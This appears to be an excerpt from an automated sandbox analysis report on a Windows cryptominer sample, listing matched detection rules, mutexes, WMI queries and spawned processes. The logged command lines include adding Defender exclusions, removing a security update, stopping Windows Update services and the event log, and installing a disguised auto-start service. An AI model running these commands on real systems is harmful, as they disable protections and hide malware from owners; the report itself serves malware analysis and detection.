          Source: 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: svchost.exe PID: 4696, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: pnhtlztmuvjx.sys.35.drBinary string: \Device\WinRing0_1_2_0
          Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@89/12@1/1
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5836:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4688:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6196:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4308:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1240:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5492:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2584:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2380:120:WilError_03
          Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\hqjofqbynosvybfu
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5424:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2964:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3836:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7056:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wev4shdz.3ic.ps1Jump to behavior
          Source: prog.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\prog.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: prog.exeReversingLabs: Detection: 73%
          Source: C:\Users\user\Desktop\prog.exeFile read: C:\Users\user\Desktop\prog.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\prog.exe "C:\Users\user\Desktop\prog.exe"
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "appdata"
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "appdata" binpath= "C:\ProgramData\win32\svhost.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "appdata"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\win32\svhost.exe C:\ProgramData\win32\svhost.exe
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "appdata"Jump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "appdata" binpath= "C:\ProgramData\win32\svhost.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "appdata"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\prog.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
